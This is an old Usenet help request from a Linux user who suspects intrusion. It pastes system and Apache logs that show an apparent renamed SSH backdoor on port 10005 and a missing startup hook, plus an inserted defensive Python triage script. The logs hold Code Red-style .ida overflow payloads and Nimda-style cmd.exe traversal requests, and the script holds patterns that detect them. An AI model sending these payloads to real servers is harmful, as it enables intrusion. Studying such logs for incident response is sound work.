Jun 27 13:18:39 localhost kernel: Based upon Swansea University Computer Society NET3.039
Jun 27 13:18:01 localhost smbd -D[240]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Initializing RT netlink socket
Jun 27 13:18:01 localhost smbd -D[261]: error: bind: Address already in use
Jun 27 13:18:39 localhost smbd -D[699]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: apm: BIOS version 1.2 Flags 0x07 (Driver version 1.14)
Jun 27 13:18:01 localhost smbd -D[261]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost smbd -D[699]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:39 localhost kernel: Starting kswapd v1.8
Jun 27 13:18:40 localhost 6월 27 13:18:01 sysctl: net.ipv4.ip_forward = 0
Jun 27 13:18:39 localhost kernel: pty: 256 Unix98 ptys configured
Jun 27 13:18:40 localhost 6월 27 13:18:01 sysctl: net.ipv4.conf.all.rp_filter = 1
Jun 27 13:18:39 localhost kernel: block: queued sectors max/low 126077kB/42025kB, 384 slots per queue
Jun 27 13:18:40 localhost 6월 27 13:18:01 sysctl: kernel.sysrq = 0
Jun 27 13:18:39 localhost kernel: RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize
Jun 27 13:18:40 localhost 6월 27 13:18:01 network: Setting network parameters: succeeded
Jun 27 13:18:39 localhost kernel: Uniform Multi-Platform E-IDE driver Revision: 6.31
Jun 27 13:18:02 localhost smbd -D[286]: error: bind: Address already in use
Jun 27 13:18:39 localhost kernel: ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx
Jun 27 13:18:02 localhost smbd -D[286]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: PIIX4: IDE controller on PCI bus 00 dev 09
Jun 27 13:18:40 localhost 6월 27 13:18:02 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:40 localhost kernel: PIIX4: chipset revision 1
Jun 27 13:18:40 localhost 6월 27 13:18:40 netfs: Mounting other filesystems: succeeded
Jun 27 13:18:03 localhost smbd -D[354]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: PIIX4: not 100%% native mode: will probe irqs later
Jun 27 13:18:03 localhost smbd -D[354]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:pio, hdb:pio
Jun 27 13:18:40 localhost 6월 27 13:18:03 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:40 localhost kernel: ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:pio, hdd:pio
Jun 27 13:18:40 localhost 6월 27 13:18:03 network: Bringing up interface lo: succeeded
Jun 27 13:18:40 localhost kernel: hda: QUANTUM FIREBALL_TM2100A, ATA DISK drive
Jun 27 13:18:04 localhost smbd -D[377]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: hdd: CRD-8160B, ATAPI CD/DVD-ROM drive
Jun 27 13:18:04 localhost smbd -D[377]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: ide0 at 0x1f0-0x1f7,0x3f6 on irq 14
Jun 27 13:18:41 localhost 6월 27 13:18:04 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:40 localhost kernel: ide1 at 0x170-0x177,0x376 on irq 15
Jun 27 13:18:41 localhost 6월 27 13:18:04 ifup: Determining IP information for eth0...
Jun 27 13:18:40 localhost smbd -D[734]: error: bind: Address already in use
Jun 27 13:18:40 localhost kernel: hda: 4124736 sectors (2112 MB) w/76KiB Cache, CHS=1023/64/63, DMA
Jun 27 13:18:04 localhost pumpd[405]: starting at (uptime 0 days, 0:00:38) Fri Jun 27 13:18:04 2003
Jun 27 13:18:40 localhost smbd -D[734]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:40 localhost kernel: Partition check:
Jun 27 13:18:41 localhost kernel: hda: hda1 hda2 hda3
Jun 27 13:18:41 localhost kernel: Floppy drive(s): fd0 is 1.44M
Jun 27 13:18:41 localhost kernel: FDC 0 is a post-1991 82077
Jun 27 13:18:41 localhost apmd[740]: Version 3.0final (APM BIOS 1.2, Linux driver 1.14)
Jun 27 13:18:41 localhost 6월 27 13:18:41 apmd: apmd startup succeeded
Jun 27 13:18:41 localhost kernel: Serial driver version 5.02 (2000-08-09) with MANY_PORTS MULTIPORT SHARE_IRQ SERIAL_PCI ISAPNP enabled
Jun 27 13:18:41 localhost kernel: ttyS00 at 0x03f8 (irq = 4) is a 16550A
Jun 27 13:18:41 localhost kernel: ttyS01 at 0x02f8 (irq = 3) is a 16550A
Jun 27 13:18:41 localhost kernel: Real Time Clock Driver v1.10d
Jun 27 13:18:41 localhost kernel: md driver 0.90.0 MAX_MD_DEVS=256, MD_SB_DISKS=27
Jun 27 13:18:41 localhost kernel: md.c: sizeof(mdp_super_t) = 4096
Jun 27 13:18:41 localhost kernel: autodetecting RAID arrays
Jun 27 13:18:41 localhost kernel: autorun ...
Jun 27 13:18:41 localhost kernel: ... autorun DONE.
Jun 27 13:18:06 localhost pumpd[405]: configured interface eth0
Jun 27 13:18:42 localhost 6월 27 13:18:10 ifup: done.
Jun 27 13:18:11 localhost smbd -D[441]: error: bind: Address already in use
Jun 27 13:18:11 localhost smbd -D[441]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6월 27 13:18:11 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:42 localhost 6월 27 13:18:11 network: Bringing up interface eth0: succeeded
Jun 27 13:18:11 localhost smbd -D[468]: error: bind: Address already in use
Jun 27 13:18:11 localhost smbd -D[468]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6월 27 13:18:12 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:13 localhost smbd -D[540]: error: bind: Address already in use
Jun 27 13:18:13 localhost smbd -D[540]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:42 localhost 6월 27 13:18:13 ifup: sh: /usr/bin/(swapd): 그런 파일이나 디렉토리가 없음
Jun 27 13:18:42 localhost 6월 27 13:18:33 network: Bringing up interface eth1: succeeded
Jun 27 13:18:41 localhost kernel: NET4: Linux TCP/IP 1.0 for NET4.0
Jun 27 13:18:34 localhost smbd -D[574]: error: bind: Address already in use
Jun 27 13:18:42 localhost kernel: IP Protocols: ICMP, UDP, TCP, IGMP
Jun 27 13:18:34 localhost smbd -D[574]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:42 localhost kernel: IP: routing cache hash table of 2048 buckets, 16Kbytes
Jun 27 13:18:42 localhost smbd -D[756]: error: bind: Address already in use
Jun 27 13:18:42 localhost apmd[740]: Charge: * * * (-1% unknown)
Jun 27 13:18:42 localhost kernel: TCP: Hash tables configured (established 16384 bind 16384)
Jun 27 13:18:42 localhost smbd -D[756]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:42 localhost kernel: Linux IP multicast router 0.06 plus PIM-SM
Jun 27 13:18:42 localhost kernel: NET4: Unix domain sockets 1.0/SMP for Linux NET4.0.
Jun 27 13:18:42 localhost kernel: VFS: Mounted root (ext2 filesystem) readonly.
Jun 27 13:18:42 localhost kernel: Freeing unused kernel memory: 528k freed
Jun 27 13:18:42 localhost kernel: Adding Swap: 32248k swap-space (priority -1)
Jun 27 13:18:42 localhost kernel: Winbond Super-IO detection, now testing ports 3F0,370,250,4E,2E ...
Jun 27 13:18:42 localhost kernel: Winbond chip at EFER=0x3f0 key=0x87 devid=fc devrev=3c oldid=8a
Jun 27 13:18:42 localhost kernel: Winbond chip type 83877F
Jun 27 13:18:42 localhost kernel: SMSC Super-IO detection, now testing Ports 2F0, 370 ...
Jun 27 13:18:43 localhost kernel: 0x378: FIFO is 16 bytes
Jun 27 13:18:43 localhost kernel: 0x378: writeIntrThreshold is 16
Jun 27 13:18:43 localhost kernel: 0x378: readIntrThreshold is 16
Jun 27 13:18:43 localhost kernel: parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE,COMPAT,EPP,ECP]
Jun 27 13:18:43 localhost kernel: parport0: irq 7 detected
Jun 27 13:18:43 localhost kernel: 8139too Fast Ethernet driver 0.9.15 loaded
Jun 27 13:18:43 localhost kernel: PCI: Found IRQ 11 for device 00:0a.0
Jun 27 13:18:43 localhost kernel: eth0: RealTek RTL8139 Fast Ethernet at 0xcc80b000, 00:a0:b0:0f:01:d7, IRQ 11
Jun 27 13:18:43 localhost kernel: eth0: Setting half-duplex based on auto-negotiated partner ability 0000.
Jun 27 13:18:43 localhost kernel: eth0: Setting half-duplex based on auto-negotiated partner ability 0000.
Jun 27 13:18:43 localhost kernel: eth1: 3c509 at 0x220, 10baseT port, address 00 a0 24 ee 4a c7, IRQ 5.
Jun 27 13:18:43 localhost kernel: 3c509.c:1.16 (2.2) 2/3/98 becker@cesdis.gsfc.nasa.gov.
Jun 27 13:18:43 localhost kernel: eth1: Setting Rx mode to 1 addresses.
Jun 27 13:18:43 localhost automount[796]: starting automounter version 3.1.7, path = /misc, maptype = file, mapname = /etc/auto.misc
Jun 27 13:18:43 localhost 6월 27 13:18:43 autofs: autofs startup succeeded
Jun 27 13:18:44 localhost smbd -D[810]: error: bind: Address already in use
Jun 27 13:18:44 localhost smbd -D[810]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.
Jun 27 13:18:44 localhost automount[796]: using kernel protocol version 3
Jun 27 13:18:45 localhost 6월 27 13:18:45 snort: Initializing daemon mode
Jun 27 13:18:45 localhost kernel: eth0: Promiscuous mode enabled.
Jun 27 13:18:45 localhost kernel: device eth0 entered promiscuous mode
Jun 27 13:18:45 localhost 6월 27 13:18:45 snortd: snort startup succeeded
Jun 27 13:18:45 localhost snort: ERROR /etc/snort/webcgi-lib:3 => Port value missing in rule!
Jun 27 13:18:45 localhost kernel: device eth0 left promiscuous mode Jun 27 13:18:46 localhost smbd -D[832]: error: bind: Address already in use Jun 27 13:18:46 localhost smbd -D[832]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: Starting sshd: Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: sh: /usr/bin/(swapd): ±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½ Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: succeeded Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 sshd: Jun 27 13:18:46 localhost 6¿ù 27 13:18:46 rc: Starting sshd: succeeded Jun 27 13:18:47 localhost smbd -D[851]: error: bind: Address already in use Jun 27 13:18:47 localhost smbd -D[851]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:18:47 localhost smbd -D[865]: error: bind: Address already in use Jun 27 13:18:47 localhost smbd -D[865]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:18:50 localhost login(pam_unix)[878]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root Jun 27 13:18:53 localhost login[878]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure Jun 27 13:18:56 localhost login(pam_unix)[878]: session opened for user root by LOGIN(uid=0) Jun 27 13:18:56 localhost -- root[878]: ROOT LOGIN ON tty1 Jun 27 13:18:58 localhost smbd -D[921]: error: bind: Address already in use Jun 27 13:18:58 localhost smbd -D[921]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:19:01 localhost smbd -D[966]: error: bind: Address already in use Jun 27 13:19:01 localhost smbd -D[966]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:22:40 localhost smbd -D[21]: log: Received signal 15; terminating. Jun 27 13:26:00 localhost smbd -D[1112]: log: Server listening on port 10005. Jun 27 13:26:00 localhost smbd -D[1112]: log: Generating 768 bit RSA key. 
Jun 27 13:26:01 localhost kernel: eth1: Setting Rx mode to 0 addresses. Jun 27 13:26:01 localhost kernel: eth1: Setting Rx mode to 1 addresses. Jun 27 13:26:02 localhost smbd -D[1213]: error: bind: Address already in use Jun 27 13:26:02 localhost smbd -D[1213]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:26:03 localhost smbd -D[1112]: log: RSA key generation complete. Jun 27 13:26:10 localhost smbd -D[1234]: error: bind: Address already in use Jun 27 13:26:10 localhost smbd -D[1234]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:26:11 localhost pumpd[1272]: starting at (uptime 0 days, 0:08:45) Fri Jun 27 13:26:11 2003 Jun 27 13:26:11 localhost kernel: eth0: Setting half-duplex based on auto-negotiated partner ability 0000. Jun 27 13:26:13 localhost kernel: eth0: Setting half-duplex based on auto-negotiated partner ability 0000. Jun 27 13:26:13 localhost pumpd[1272]: configured interface eth0 Jun 27 13:26:14 localhost smbd -D[1322]: error: bind: Address already in use Jun 27 13:26:14 localhost smbd -D[1322]: fatal: Bind to port 10005 failed: Transport endpoint is not connected. Jun 27 13:26:30 localhost kernel: ip_tables: (c)2000 Netfilter core team Jun 27 13:26:30 localhost kernel: ip_conntrack (1536 buckets, 12288 max) Jun 27 13:26:40 localhost smbd -D[1112]: log: Received signal 15; terminating. I didn't run smbd, which keeps trying to open port 10005... I guess this smbd is the tool of hacking.. 
Also I found some strange things in /var/log/httpd/access_log:

218.236.111.207 - - [27/Jun/2003:03:32:20 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a HTTP/1.0" 404 283 "-" "-"

Here, this is strange. "GET /default.ida" looks like hacking, doesn't it??

218.236.61.59 - - [27/Jun/2003:03:35:45 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd 3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5 3ff%u0078%u0000%u00=a HTTP/1.0" 404 283 "-" "-"

I have found several things like this..
220.73.24.200 - - [27/Jun/2003:09:33:48 +0900] "GET /myhome/index.html HTTP/1.1" 200 549 "http://myhome.hanafos.com/~abraxsus/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

Here he used several IP addresses... Also, this is httpd/error_log. 192.168.x.x are my other computers connected to my box, but 218.x.x.x seem to be that hacker's IPs..

[Fri Jun 27 02:56:19 2003] [notice] Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01 configured -- resuming normal operations
[Fri Jun 27 02:56:19 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Fri Jun 27 02:59:18 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 02:59:25 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 02:59:40 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/back.gif
[Fri Jun 27 02:59:41 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/back.gif
[Fri Jun 27 03:03:20 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:03:29 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 03:08:15 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:32:20 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 03:33:43 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:33:50 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 03:35:45 2003] [error] [client 218.236.61.59] File does not exist: /var/www/html/default.ida
[Fri Jun 27 03:47:19 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 03:47:25 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/root.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/MSADC/root.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Fri Jun 27 04:01:05 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..?../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..À¯../winnt/system32/cmd.exe
[Fri Jun 27 04:01:06 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..?../winnt/system32/cmd.exe
[Fri Jun 27 04:01:07 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jun 27 04:01:07 2003] [error] [client 218.147.95.14] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Fri Jun 27 04:15:02 2003] [error] [client 218.50.170.120] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:36:42 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:46:42 2003] [error] [client 218.236.76.71] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:50:28 2003] [error] [client 218.64.85.21] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:57:48 2003] [error] [client 218.236.128.18] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:59:26 2003] [error] [client 218.236.128.18] File does not exist: /var/www/html/default.ida
[Fri Jun 27 04:59:35 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 05:01:10 2003] [error] [client 218.236.128.18] File does not exist: /var/www/html/default.ida
[Fri Jun 27 05:35:47 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 05:46:29 2003] [error] [client 218.236.76.71] File does not exist: /var/www/html/default.ida
[Fri Jun 27 06:08:27 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 06:11:54 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 06:53:23 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 194.226.48.12) (OpenSSL library error follows)
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:0406506C:rsa routines:RSA_EAY_PRIVATE_DECRYPT:data greater than mod len
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:140BB004:SSL routines:SSL_RSA_PRIVATE_DECRYPT:nested asn1 error
[Fri Jun 27 06:53:23 2003] [error] OpenSSL: error:1406B0CE:SSL routines:GET_CLIENT_MASTER_KEY:problems mapping cipher functions
[Fri Jun 27 06:54:51 2003] [error] [client 218.236.235.252] File does not exist: /var/www/html/default.ida
[Fri Jun 27 07:19:36 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 07:30:45 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 07:31:02 2003] [error] [client 218.236.204.221] File does not exist: /var/www/html/default.ida
[Fri Jun 27 08:00:40 2003] [error] [client 218.236.204.221] File does not exist: /var/www/html/default.ida
[Fri Jun 27 08:05:10 2003] [error] [client 218.236.204.221] File does not exist: /var/www/html/default.ida
[Fri Jun 27 08:55:08 2003] [error] [client 218.236.204.221] File does not exist: /var/www/html/default.ida
[Fri Jun 27 09:10:30 2003] [error] [client 218.236.12.138] File does not exist: /var/www/html/default.ida
[Fri Jun 27 09:18:26 2003] [error] [client 218.236.196.209] File does not exist: /var/www/html/default.ida
[Fri Jun 27 09:20:31 2003] [error] [client 218.236.196.209] File does not exist: /var/www/html/default.ida
[Fri Jun 27 09:33:48 2003] [error] [client 220.73.24.200] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 09:47:37 2003] [error] [client 218.238.80.247] File does not exist: /var/www/html/default.ida
[Fri Jun 27 09:54:06 2003] [error] [client 218.236.12.138] File does not exist: /var/www/html/default.ida
[Fri Jun 27 10:10:14 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 10:10:28 2003] [error] [client 218.88.34.99] File does not exist: /var/www/html/default.ida
[Fri Jun 27 10:26:12 2003] [error] [client 218.236.196.209] File does not exist: /var/www/html/default.ida
[Fri Jun 27 10:35:22 2003] [error] [client 218.149.39.14] File does not exist: /var/www/html/default.ida
[Fri Jun 27 11:40:52 2003] [error] [client 218.236.204.221] File does not exist: /var/www/html/default.ida
[Fri Jun 27 11:48:27 2003] [error] [client 218.236.4.72] File does not exist: /var/www/html/default.ida
[Fri Jun 27 11:49:58 2003] [error] [client 218.236.12.138] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:02:40 2003] [error] [client 218.236.168.182] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:02:55 2003] [error] [client 61.73.21.187] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 12:04:19 2003] [error] [client 218.236.196.209] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:16:50 2003] [error] [client 218.236.111.207] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:29:55 2003] [error] [client 61.187.56.151] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:33:45 2003] [error] [client 218.147.128.68] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:45:09 2003] [error] [client 218.236.244.201] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:47:03 2003] [error] [client 218.236.168.182] File does not exist: /var/www/html/default.ida
[Fri Jun 27 12:47:11 2003] [error] [client 218.236.244.201] File does not exist: /var/www/html/default.ida
[Fri Jun 27 13:08:52 2003] [error] [client 218.236.226.4] File does not exist: /var/www/html/default.ida
[Fri Jun 27 13:15:53 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/Images/dark5.gif
[Fri Jun 27 13:16:03 2003] [error] [client 192.168.0.2] File does not exist: /var/www/html/myhome/XeoMenuBeanInfo.class
[Fri Jun 27 13:16:21 2003] [notice] caught SIGTERM, shutting down

What do you think about this?? What should I do?? Where can I learn more about security??
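As an added triage example (not from the thread and not code by any of the posters), this Python script reads lines shaped like the two logs above: it flags a daemon named smbd that logs SSH-server messages or binds a port smbd never uses, flags a startup script that execs a binary which no longer exists, and sorts the web requests into IIS worm noise versus ordinary traffic, counted per source address. The sample lines, the EXPECTED_PORTS allow-list and the classification names are constructed assumptions, not values from the post.

```python
"""Triage helpers for the two logs quoted above: the /var/log/messages excerpt
(the 'smbd' that keeps binding port 10005 and the missing /usr/bin/(swapd)) and
the Apache access_log excerpt (the default.ida and cmd.exe requests).
Added example, not code from the thread; all sample lines are constructed."""
import re
from collections import Counter, defaultdict

# Assumption: a small allow-list of ports each daemon is expected to own.
EXPECTED_PORTS = {"smbd": {139, 445}, "sshd": {22}, "httpd": {80, 443}}

# syslog line, tolerating the doubled timestamp that rc scripts emit
# ("localhost Jun 27 13:18:03 ifup: ...") and the "smbd -D[pid]" form.
SYSLOG = re.compile(
    r"^\S+ +\d+ \S+ \S+ (?:\S+ \d+ \S+ )?"
    r"(?P<prog>[^\s\[:]+)(?: -D)?(?:\[\d+\])?: (?P<msg>.*)$")
MISSING_BIN = re.compile(r"\bsh: (/\S+):")   # "sh: /usr/bin/(swapd): No such file"
BIND_FAIL = re.compile(r"Bind to port (\d+) failed")
LISTENING = re.compile(r"Server listening on port (\d+)")
# Only an SSH server logs these; any other process name means a renamed binary.
SSHD_STYLE = re.compile(r"Generating \d+ bit RSA key|Server listening on port \d+")


def scan_messages(lines):
    """Return (kind, program, detail) findings, first occurrence only."""
    findings = []
    for line in lines:
        m = SYSLOG.match(line)
        if not m:
            continue
        prog, msg = m["prog"], m["msg"]
        hook = MISSING_BIN.search(msg)
        if hook:
            # A boot/ifup script tried to exec a binary that is gone: the edited
            # script is the artifact to examine, not the absent file.
            findings.append(("startup_hook_missing_binary", prog, hook.group(1)))
        port = BIND_FAIL.search(msg) or LISTENING.search(msg)
        if port and prog in EXPECTED_PORTS and int(port.group(1)) not in EXPECTED_PORTS[prog]:
            findings.append(("unexpected_port", prog, int(port.group(1))))
        if SSHD_STYLE.search(msg) and prog != "sshd":
            findings.append(("sshd_messages_from", prog, msg))
    return list(dict.fromkeys(findings))  # drop repeats, keep first-seen order


# Apache common/combined log: ip ident user [ts] "method path proto" status ...
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify_request(path):
    """Sort a request path into IIS worm noise versus ordinary traffic."""
    p = path.lower()
    if p.startswith("/default.ida?") and "%u" in p:
        return "code-red-worm"        # IIS .ida overflow probe; Apache just 404s it
    if "cmd.exe" in p or "root.exe" in p:
        return "nimda-iis-traversal"  # Unicode/double-decode traversal aimed at IIS
    return "ordinary"


def summarize_access(lines):
    """Map classification -> Counter of source IPs so repeat probers stand out."""
    by_kind = defaultdict(Counter)
    for line in lines:
        m = CLF.match(line)
        if m:
            by_kind[classify_request(m["path"])][m["ip"]] += 1
    return dict(by_kind)


# Constructed samples shaped like the lines in the post (payload shortened).
SAMPLE_MESSAGES = [
    "Jun 27 13:18:40 localhost kernel: ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:pio, hdb:pio",
    "Jun 27 13:18:40 localhost Jun 27 13:18:03 ifup: sh: /usr/bin/(swapd): No such file or directory",
    "Jun 27 13:18:04 localhost smbd -D[377]: fatal: Bind to port 10005 failed: Transport endpoint is not connected.",
    "Jun 27 13:18:46 localhost Jun 27 13:18:46 sshd: sh: /usr/bin/(swapd): No such file or directory",
    "Jun 27 13:26:00 localhost smbd -D[1112]: log: Server listening on port 10005.",
    "Jun 27 13:26:00 localhost smbd -D[1112]: log: Generating 768 bit RSA key.",
]
SAMPLE_ACCESS = [
    '218.236.111.207 - - [27/Jun/2003:03:32:20 +0900] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 283 "-" "-"',
    '218.236.61.59 - - [27/Jun/2003:03:35:45 +0900] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 283 "-" "-"',
    '218.147.95.14 - - [27/Jun/2003:04:01:07 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"',
    '218.236.111.207 - - [27/Jun/2003:04:36:42 +0900] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 283 "-" "-"',
    '220.73.24.200 - - [27/Jun/2003:09:33:48 +0900] "GET /myhome/index.html HTTP/1.1" 200 549 "http://myhome.hanafos.com/~abraxsus/" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in scan_messages(SAMPLE_MESSAGES):
        print("messages:", *finding)
    for kind, ips in summarize_access(SAMPLE_ACCESS).items():
        print("access_log:", kind, dict(ips))
```

The web hits are background scanning that Apache answers with 404; the findings from the messages log (a renamed SSH server on port 10005 and boot scripts patched to launch a missing binary) are what indicate the box itself was altered.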
"Min,Lee" <abraxsus@nownuri.net> wrote in news:bdgkk1$p1o$1@news.hananet.net:

> I think my server box is hacked !!
> help me!..
> These are my log files...

